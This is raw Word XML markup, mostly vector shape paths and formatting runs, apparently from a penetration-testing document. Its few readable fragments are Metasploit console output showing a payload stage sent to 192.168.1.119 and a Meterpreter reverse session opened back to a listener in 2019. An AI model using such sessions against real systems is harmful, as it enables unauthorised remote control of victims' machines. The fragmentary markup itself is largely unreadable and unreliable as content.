        <v:shape style="position:absolute;left:3490;top:3850;width:130;height:270" coordorigin="3490,3850" coordsize="130,270" path="m3506,3866l3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3506,3866,3507,3866,3507,3866,3507,3866,3507,3866,3507,3866,3507,3866,3507,3866,3508,3866,3508,3866,3508,3866,3508,3866,3508,3866,3509,3866,3509,3866,3509,3866,3509,3866,3510,3866,3510,3866,3510,3866,3511,3866,3511,3866,3511,3866,3512,3866,3512,3866,3513,3866,3513,3866,3514,3866,3514,3866,3515,3866,3515,3866,3516,3866,3516,3866,3517,3866,3518,3866,3518,3866,3519,3866,3520,3866,3520,3866,3521,3866,3522,3866,3523,3866,3524,3866,3524,3866,3525,3866,3526,3866,3527,3866,3528,3866,3529,3866,3530,3866,3531,3866,3532,3866,3533,3866,3535,3866,3536,3866,3537,3866,3538,3866,3540,3866,3541,3866,3542,3866,3544,3866,3545,3866,3547,3866,3548,3866,3550,3866,3551,3866,3553,3866,3554,3866,3556,3866,3558,3866,3559,3866,3561,3866,3563,3866,3565,3866,3567,3866,3569,3866,3571,3866,3573,3866,3575,3866,3577,3866,3579,3866,3581,3866,3584,3866,3586,3866,3588,3866,3591,3866,3593,3866,3596,3866,3598,3866,3601,3866,3603,3866,3606,3866,3609,3866,3611,3866,3614,3866,3617,3866,3620,3866,3623,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3866,3626,3867,3626,3867,3626,3867,3626,3867,3626,3867,3626,3867,3626,3868,3626,3868,3626,3868,3626,3868,3626,3869,3626,3869,3626,3869,3626,3870,3626,3870,3626,3870,3626,3871,3626,3871,3626,3872,3626,3872,3626,3873,3626,3874,3626,3874,3626,3875,3626,3876,3626,3876,3626,3877,3626,3878,3626,3879,3626,3880,3626,3881,3626,3882,3626,3883,3626,3884,3626,3885,3626,3886,3626,3887,3626,3888,3626,3890,3626,3891,3626,3893,3626,3894,3626,3895,3626,3897,3626,3899,3626,3900,3626,3902,3626,3904,3626,3906,3626,3908,3626,3909,3626,3911,3626,3914,3626,3916,3626,3918,3626,3920,3626,3922,3626,3925,3626,3927,3626,3930,3626,3932,3626,3935,3626,3938,3626,3941,3626,3943,3626,3946,3626,3949,3626,3953,3626,3956,3626,3959,3626,3962,3626,3966,3626,3969,3626,3973,3626,3976,3626,3980,3626,3984,3626,3988,3626,3992,3626,3996,3626,4000,3626,4004,3626,4008,3626,4013,3626,4017,3626,4022,3626,4027,3626,4031,3626,4036,3626,4041,3626,4046,3626,4051,3626,4057,3626,4062,3626,4067,3626,4073,3626,4079,3626,4084,3626,4090,3626,4096,3626,4102,3626,4108,3626,4115,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3626,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3625,4121,3624,4121,3624,4121,3624,4121,3624,4121,3624,4121,3623,4121,3623,4121,3623,4121,3623,4121,3623,4121,3622,4121,3622,4121,3622,4121,3621,4121,3621,4121,3621,4121,3620,4121,3620,4121,3619,4121,3619,4121,3618,4121,3618,4121,3617,4121,3617,4121,3616,4121,3616,4121,3615,4121,3615,4121,3614,4121,3613,4121,3613,4121,3612,4121,3611,4121,3610,4121,3610,4121,3609,4121,3608,4121,3607,4121,3606,4121,3605,4121,3604,4121,3603,4121,3602,4121,3601,4121,3600,4121,3599,4121,3598,4121,3597,4121,3596,4121,3595,4121,3593,4121,3592,4121,3591,4121,3589,4121,3588,4121,3587,4121,3585,4121,3584,4121,3582,4121,3581,4121,3579,4121,3577,4121,3576,4121,3574,4121,3572,4121,3570,4121,3569,4121,3567,4121,3565,4121,3563,4121,3561,4121,3559,4121,3557,4121,3555,4121,3552,4121,3550,4121,3548,4121,3546,4121,3543,4121,3541,4121,3539,4121,3536,4121,3534,4121,3531,4121,3528,4121,3526,4121,3523,4121,3520,4121,3517,4121,3515,4121,3512,4121,3509,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4121,3506,4120,3506,4120,3506,4120,3506,4120,3506,4120,3506,4120,3506,4119,3506,4119,3506,4119,3506,4119,3506,4118,3506,4118,3506,4118,3506,4117,3506,4117,3506,4117,3506,4116,3506,4116,3506,4115,3506,4115,3506,4114,3506,4113,3506,4113,3506,4112,3506,4111,3506,4111,3506,4110,3506,4109,3506,4108,3506,4107,3506,4106,3506,4105,3506,4104,3506,4103,3506,4102,3506,4101,3506,4100,3506,4099,3506,4097,3506,4096,3506,4094,3506,4093,3506,4092,3506,4090,3506,4088,3506,4087,3506,4085,3506,4083,3506,4081,3506,4079,3506,4078,3506,4076,3506,4073,3506,4071,3506,4069,3506,4067,3506,4065,3506,4062,3506,4060,3506,4057,3506,4055,3506,4052,3506,4049,3506,4046,3506,4044,3506,4041,3506,4038,3506,4035,3506,4031,3506,4028,3506,4025,3506,4021,3506,4018,3506,4014,3506,4011,3506,4007,3506,4003,3506,3999,3506,3995,3506,3991,3506,3987,3506,3983,3506,3979,3506,3974,3506,3970,3506,3965,3506,3960,3506,3956,3506,3951,3506,3946,3506,3941,3506,3936,3506,3930,3506,3925,3506,3920,3506,3914,3506,3908,3506,3903,3506,3897,3506,3891,3506,3885,3506,3879,3506,3872,3506,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:444.500pt;margin-top:210.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8890,4210" coordsize="250,270">
        <v:shape style="position:absolute;left:8890;top:4210;width:250;height:270" coordorigin="8890,4210" coordsize="250,270" path="m8908,4226l8908,4226,8908,4226,8908,4226,8908,4226,8908,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8909,4226,8910,4226,8910,4226,8910,4226,8910,4226,8910,4226,8911,4226,8911,4226,8911,4226,8912,4226,8912,4226,8912,4226,8913,4226,8913,4226,8914,4226,8914,4226,8915,4226,8915,4226,8916,4226,8916,4226,8917,4226,8918,4226,8918,4226,8919,4226,8920,4226,8921,4226,8921,4226,8922,4226,8923,4226,8924,4226,8925,4226,8926,4226,8927,4226,8929,4226,8930,4226,8931,4226,8932,4226,8934,4226,8935,4226,8936,4226,8938,4226,8939,4226,8941,4226,8942,4226,8944,4226,8946,4226,8948,4226,8949,4226,8951,4226,8953,4226,8955,4226,8957,4226,8959,4226,8962,4226,8964,4226,8966,4226,8969,4226,8971,4226,8974,4226,8976,4226,8979,4226,8981,4226,8984,4226,8987,4226,8990,4226,8993,4226,8996,4226,8999,4226,9002,4226,9006,4226,9009,4226,9012,4226,9016,4226,9019,4226,9023,4226,9027,4226,9031,4226,9035,4226,9039,4226,9043,4226,9047,4226,9051,4226,9055,4226,9060,4226,9064,4226,9069,4226,9073,4226,9078,4226,9083,4226,9088,4226,9093,4226,9098,4226,9103,4226,9109,4226,9114,4226,9120,4226,9125,4226,9131,4226,9137,4226,9143,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4226,9149,4227,9149,4227,9149,4227,9149,4227,9149,4227,9149,4227,9149,4227,9149,4228,9149,4228,9149,4228,9149,4228,9149,4228,9149,4229,9149,4229,9149,4229,9149,4230,9149,4230,9149,4231,9149,4231,9149,4232,9149,4232,9149,4233,9149,4233,9149,4234,9149,4234,9149,4235,9149,4236,9149,4237,9149,4237,9149,4238,9149,4239,9149,4240,9149,4241,9149,4242,9149,4243,9149,4244,9149,4245,9149,4246,9149,4247,9149,4249,9149,4250,9149,4251,9149,4253,9149,4254,9149,4256,9149,4257,9149,4259,9149,4260,9149,4262,9149,4264,9149,4266,9149,4268,9149,4270,9149,4272,9149,4274,9149,4276,9149,4278,9149,4280,9149,4283,9149,4285,9149,4287,9149,4290,9149,4293,9149,4295,9149,4298,9149,4301,9149,4304,9149,4307,9149,4310,9149,4313,9149,4316,9149,4319,9149,4322,9149,4326,9149,4329,9149,4333,9149,4336,9149,4340,9149,4344,9149,4348,9149,4352,9149,4356,9149,4360,9149,4364,9149,4369,9149,4373,9149,4378,9149,4382,9149,4387,9149,4392,9149,4396,9149,4401,9149,4406,9149,4412,9149,4417,9149,4422,9149,4428,9149,4433,9149,4439,9149,4445,9149,4450,9149,4456,9149,4462,9149,4469,9149,4475,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9149,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9148,4481,9147,4481,9147,4481,9147,4481,9147,4481,9147,4481,9146,4481,9146,4481,9146,4481,9145,4481,9145,4481,9145,4481,9144,4481,9144,4481,9143,4481,9143,4481,9142,4481,9142,4481,9141,4481,9141,4481,9140,4481,9139,4481,9139,4481,9138,4481,9137,4481,9136,4481,9136,4481,9135,4481,9134,4481,9133,4481,9132,4481,9131,4481,9130,4481,9129,4481,9127,4481,9126,4481,9125,4481,9124,4481,9122,4481,9121,4481,9119,4481,9118,4481,9116,4481,9115,4481,9113,4481,9111,4481,9109,4481,9108,4481,9106,4481,9104,4481,9102,4481,9100,4481,9098,4481,9095,4481,9093,4481,9091,4481,9088,4481,9086,4481,9084,4481,9081,4481,9078,4481,9076,4481,9073,4481,9070,4481,9067,4481,9064,4481,9061,4481,9058,4481,9055,4481,9052,4481,9048,4481,9045,4481,9041,4481,9038,4481,9034,4481,9030,4481,9026,4481,9023,4481,9019,4481,9014,4481,9010,4481,9006,4481,9002,4481,8997,4481,8993,4481,8988,4481,8984,4481,8979,4481,8974,4481,8969,4481,8964,4481,8959,4481,8954,4481,8948,4481,8943,4481,8938,4481,8932,4481,8926,4481,8920,4481,8914,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4481,8908,4480,8908,4480,8908,4480,8908,4480,8908,4480,8908,4479,8908,4479,8908,4479,8908,4479,8908,4478,8908,4478,8908,4478,8908,4477,8908,4477,8908,4476,8908,4476,8908,4475,8908,4475,8908,4474,8908,4474,8908,4473,8908,4472,8908,4472,8908,4471,8908,4470,8908,4469,8908,4468,8908,4467,8908,4467,8908,4466,8908,4465,8908,4463,8908,4462,8908,4461,8908,4460,8908,4459,8908,4457,8908,4456,8908,4455,8908,4453,8908,4452,8908,4450,8908,4449,8908,4447,8908,4445,8908,4443,8908,4442,8908,4440,8908,4438,8908,4436,8908,4434,8908,4432,8908,4429,8908,4427,8908,4425,8908,4422,8908,4420,8908,4417,8908,4415,8908,4412,8908,4409,8908,4407,8908,4404,8908,4401,8908,4398,8908,4395,8908,4392,8908,4388,8908,4385,8908,4382,8908,4378,8908,4375,8908,4371,8908,4367,8908,4363,8908,4359,8908,4356,8908,4351,8908,4347,8908,4343,8908,4339,8908,4334,8908,4330,8908,4325,8908,4321,8908,4316,8908,4311,8908,4306,8908,4301,8908,4296,8908,4291,8908,4285,8908,4280,8908,4274,8908,4269,8908,4263,8908,4257,8908,4251,8908,4245,8908,4239,8908,4233,8908,4226e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:498.500pt;margin-top:210.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9970,4210" coordsize="130,270">
        <v:shape style="position:absolute;left:9970;top:4210;width:130;height:270" coordorigin="9970,4210" coordsize="130,270" path="m9989,4226l9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9989,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9990,4226,9991,4226,9991,4226,9991,4226,9991,4226,9991,4226,9992,4226,9992,4226,9992,4226,9992,4226,9993,4226,9993,4226,9993,4226,9994,4226,9994,4226,9994,4226,9995,4226,9995,4226,9996,4226,9996,4226,9996,4226,9997,4226,9997,4226,9998,4226,9998,4226,9999,4226,10000,4226,10000,4226,10001,4226,10002,4226,10002,4226,10003,4226,10004,4226,10004,4226,10005,4226,10006,4226,10007,4226,10008,4226,10009,4226,10010,4226,10010,4226,10011,4226,10012,4226,10013,4226,10015,4226,10016,4226,10017,4226,10018,4226,10019,4226,10020,4226,10022,4226,10023,4226,10024,4226,10026,4226,10027,4226,10028,4226,10030,4226,10031,4226,10033,4226,10034,4226,10036,4226,10038,4226,10039,4226,10041,4226,10043,4226,10045,4226,10046,4226,10048,4226,10050,4226,10052,4226,10054,4226,10056,4226,10058,4226,10060,4226,10062,4226,10065,4226,10067,4226,10069,4226,10072,4226,10074,4226,10076,4226,10079,4226,10081,4226,10084,4226,10086,4226,10089,4226,10092,4226,10095,4226,10097,4226,10100,4226,10103,4226,10106,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4226,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4227,10109,4228,10109,4228,10109,4228,10109,4228,10109,4228,10109,4229,10109,4229,10109,4229,10109,4230,10109,4230,10109,4231,10109,4231,10109,4232,10109,4232,10109,4233,10109,4233,10109,4234,10109,4234,10109,4235,10109,4236,10109,4237,10109,4237,10109,4238,10109,4239,10109,4240,10109,4241,10109,4242,10109,4243,10109,4244,10109,4245,10109,4246,10109,4247,10109,4249,10109,4250,10109,4251,10109,4253,10109,4254,10109,4256,10109,4257,10109,4259,10109,4260,10109,4262,10109,4264,10109,4266,10109,4268,10109,4270,10109,4272,10109,4274,10109,4276,10109,4278,10109,4280,10109,4283,10109,4285,10109,4287,10109,4290,10109,4293,10109,4295,10109,4298,10109,4301,10109,4304,10109,4307,10109,4310,10109,4313,10109,4316,10109,4319,10109,4322,10109,4326,10109,4329,10109,4333,10109,4336,10109,4340,10109,4344,10109,4348,10109,4352,10109,4356,10109,4360,10109,4364,10109,4369,10109,4373,10109,4378,10109,4382,10109,4387,10109,4392,10109,4396,10109,4401,10109,4406,10109,4412,10109,4417,10109,4422,10109,4428,10109,4433,10109,4439,10109,4445,10109,4450,10109,4456,10109,4462,10109,4469,10109,4475,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10109,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10108,4481,10107,4481,10107,4481,10107,4481,10107,4481,10107,4481,10106,4481,10106,4481,10106,4481,10105,4481,10105,4481,10105,4481,10105,4481,10104,4481,10104,4481,10103,4481,10103,4481,10103,4481,10102,4481,10102,4481,10101,4481,10101,4481,10100,4481,10100,4481,10099,4481,10098,4481,10098,4481,10097,4481,10097,4481,10096,4481,10095,4481,10094,4481,10094,4481,10093,4481,10092,4481,10091,4481,10090,4481,10090,4481,10089,4481,10088,4481,10087,4481,10086,4481,10085,4481,10084,4481,10083,4481,10081,4481,10080,4481,10079,4481,10078,4481,10077,4481,10075,4481,10074,4481,10073,4481,10071,4481,10070,4481,10068,4481,10067,4481,10065,4481,10064,4481,10062,4481,10061,4481,10059,4481,10057,4481,10055,4481,10054,4481,10052,4481,10050,4481,10048,4481,10046,4481,10044,4481,10042,4481,10040,4481,10038,4481,10036,4481,10033,4481,10031,4481,10029,4481,10027,4481,10024,4481,10022,4481,10019,4481,10017,4481,10014,4481,10012,4481,10009,4481,10006,4481,10004,4481,10001,4481,9998,4481,9995,4481,9992,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4481,9989,4480,9989,4480,9989,4480,9989,4480,9989,4480,9989,4479,9989,4479,9989,4479,9989,4479,9989,4478,9989,4478,9989,4478,9989,4477,9989,4477,9989,4476,9989,4476,9989,4475,9989,4475,9989,4474,9989,4474,9989,4473,9989,4472,9989,4472,9989,4471,9989,4470,9989,4469,9989,4468,9989,4467,9989,4467,9989,4466,9989,4465,9989,4463,9989,4462,9989,4461,9989,4460,9989,4459,9989,4457,9989,4456,9989,4455,9989,4453,9989,4452,9989,4450,9989,4449,9989,4447,9989,4445,9989,4443,9989,4442,9989,4440,9989,4438,9989,4436,9989,4434,9989,4432,9989,4429,9989,4427,9989,4425,9989,4422,9989,4420,9989,4417,9989,4415,9989,4412,9989,4409,9989,4407,9989,4404,9989,4401,9989,4398,9989,4395,9989,4392,9989,4388,9989,4385,9989,4382,9989,4378,9989,4375,9989,4371,9989,4367,9989,4363,9989,4359,9989,4356,9989,4351,9989,4347,9989,4343,9989,4339,9989,4334,9989,4330,9989,4325,9989,4321,9989,4316,9989,4311,9989,4306,9989,4301,9989,4296,9989,4291,9989,4285,9989,4280,9989,4274,9989,4269,9989,4263,9989,4257,9989,4251,9989,4245,9989,4239,9989,4233,9989,4226e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:4850;width:130;height:270" coordorigin="3490,4850" coordsize="130,270" path="m3506,4871l3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3506,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3507,4871,3508,4871,3508,4871,3508,4871,3508,4871,3508,4871,3509,4871,3509,4871,3509,4871,3509,4871,3510,4871,3510,4871,3510,4871,3511,4871,3511,4871,3511,4871,3512,4871,3512,4871,3513,4871,3513,4871,3514,4871,3514,4871,3515,4871,3515,4871,3516,4871,3516,4871,3517,4871,3518,4871,3518,4871,3519,4871,3520,4871,3520,4871,3521,4871,3522,4871,3523,4871,3524,4871,3524,4871,3525,4871,3526,4871,3527,4871,3528,4871,3529,4871,3530,4871,3531,4871,3532,4871,3533,4871,3535,4871,3536,4871,3537,4871,3538,4871,3540,4871,3541,4871,3542,4871,3544,4871,3545,4871,3547,4871,3548,4871,3550,4871,3551,4871,3553,4871,3554,4871,3556,4871,3558,4871,3559,4871,3561,4871,3563,4871,3565,4871,3567,4871,3569,4871,3571,4871,3573,4871,3575,4871,3577,4871,3579,4871,3581,4871,3584,4871,3586,4871,3588,4871,3591,4871,3593,4871,3596,4871,3598,4871,3601,4871,3603,4871,3606,4871,3609,4871,3611,4871,3614,4871,3617,4871,3620,4871,3623,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4871,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4872,3626,4873,3626,4873,3626,4873,3626,4873,3626,4874,3626,4874,3626,4874,3626,4874,3626,4875,3626,4875,3626,4876,3626,4876,3626,4876,3626,4877,3626,4877,3626,4878,3626,4879,3626,4879,3626,4880,3626,4880,3626,4881,3626,4882,3626,4883,3626,4883,3626,4884,3626,4885,3626,4886,3626,4887,3626,4888,3626,4889,3626,4890,3626,4892,3626,4893,3626,4894,3626,4895,3626,4897,3626,4898,3626,4899,3626,4901,3626,4903,3626,4904,3626,4906,3626,4908,3626,4909,3626,4911,3626,4913,3626,4915,3626,4917,3626,4919,3626,4921,3626,4923,3626,4926,3626,4928,3626,4930,3626,4933,3626,4935,3626,4938,3626,4941,3626,4943,3626,4946,3626,4949,3626,4952,3626,4955,3626,4958,3626,4961,3626,4964,3626,4968,3626,4971,3626,4975,3626,4978,3626,4982,3626,4986,3626,4989,3626,4993,3626,4997,3626,5001,3626,5005,3626,5010,3626,5014,3626,5018,3626,5023,3626,5027,3626,5032,3626,5037,3626,5042,3626,5047,3626,5052,3626,5057,3626,5062,3626,5068,3626,5073,3626,5079,3626,5084,3626,5090,3626,5096,3626,5102,3626,5108,3626,5114,3626,5120,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3626,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3625,5127,3624,5127,3624,5127,3624,5127,3624,5127,3624,5127,3623,5127,3623,5127,3623,5127,3623,5127,3623,5127,3622,5127,3622,5127,3622,5127,3621,5127,3621,5127,3621,5127,3620,5127,3620,5127,3619,5127,3619,5127,3618,5127,3618,5127,3617,5127,3617,5127,3616,5127,3616,5127,3615,5127,3615,5127,3614,5127,3613,5127,3613,5127,3612,5127,3611,5127,3610,5127,3610,5127,3609,5127,3608,5127,3607,5127,3606,5127,3605,5127,3604,5127,3603,5127,3602,5127,3601,5127,3600,5127,3599,5127,3598,5127,3597,5127,3596,5127,3595,5127,3593,5127,3592,5127,3591,5127,3589,5127,3588,5127,3587,5127,3585,5127,3584,5127,3582,5127,3581,5127,3579,5127,3577,5127,3576,5127,3574,5127,3572,5127,3570,5127,3569,5127,3567,5127,3565,5127,3563,5127,3561,5127,3559,5127,3557,5127,3555,5127,3552,5127,3550,5127,3548,5127,3546,5127,3543,5127,3541,5127,3539,5127,3536,5127,3534,5127,3531,5127,3528,5127,3526,5127,3523,5127,3520,5127,3517,5127,3515,5127,3512,5127,3509,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5127,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5126,3506,5125,3506,5125,3506,5125,3506,5125,3506,5124,3506,5124,3506,5124,3506,5124,3506,5123,3506,5123,3506,5122,3506,5122,3506,5122,3506,5121,3506,5121,3506,5120,3506,5120,3506,5119,3506,5118,3506,5118,3506,5117,3506,5116,3506,5115,3506,5115,3506,5114,3506,5113,3506,5112,3506,5111,3506,5110,3506,5109,3506,5108,3506,5106,3506,5105,3506,5104,3506,5103,3506,5101,3506,5100,3506,5099,3506,5097,3506,5095,3506,5094,3506,5092,3506,5090,3506,5089,3506,5087,3506,5085,3506,5083,3506,5081,3506,5079,3506,5077,3506,5075,3506,5072,3506,5070,3506,5068,3506,5065,3506,5063,3506,5060,3506,5057,3506,5055,3506,5052,3506,5049,3506,5046,3506,5043,3506,5040,3506,5037,3506,5034,3506,5030,3506,5027,3506,5023,3506,5020,3506,5016,3506,5012,3506,5009,3506,5005,3506,5001,3506,4997,3506,4993,3506,4988,3506,4984,3506,4980,3506,4975,3506,4971,3506,4966,3506,4961,3506,4956,3506,4951,3506,4946,3506,4941,3506,4936,3506,4931,3506,4925,3506,4920,3506,4914,3506,4908,3506,4902,3506,4896,3506,4890,3506,4884,3506,4878,3506,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:298.800pt;width:467.400pt;height:141.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId42" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:636.0pt;width:7.200pt;height:8.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId43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78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4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Sending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stage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(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179779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bytes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)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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to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192.168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.1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.119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5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Meterpreter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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session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11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opened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(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192.168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.1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.5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53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192.168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.1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.119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389</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6366" w:firstLine="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32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2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0500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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
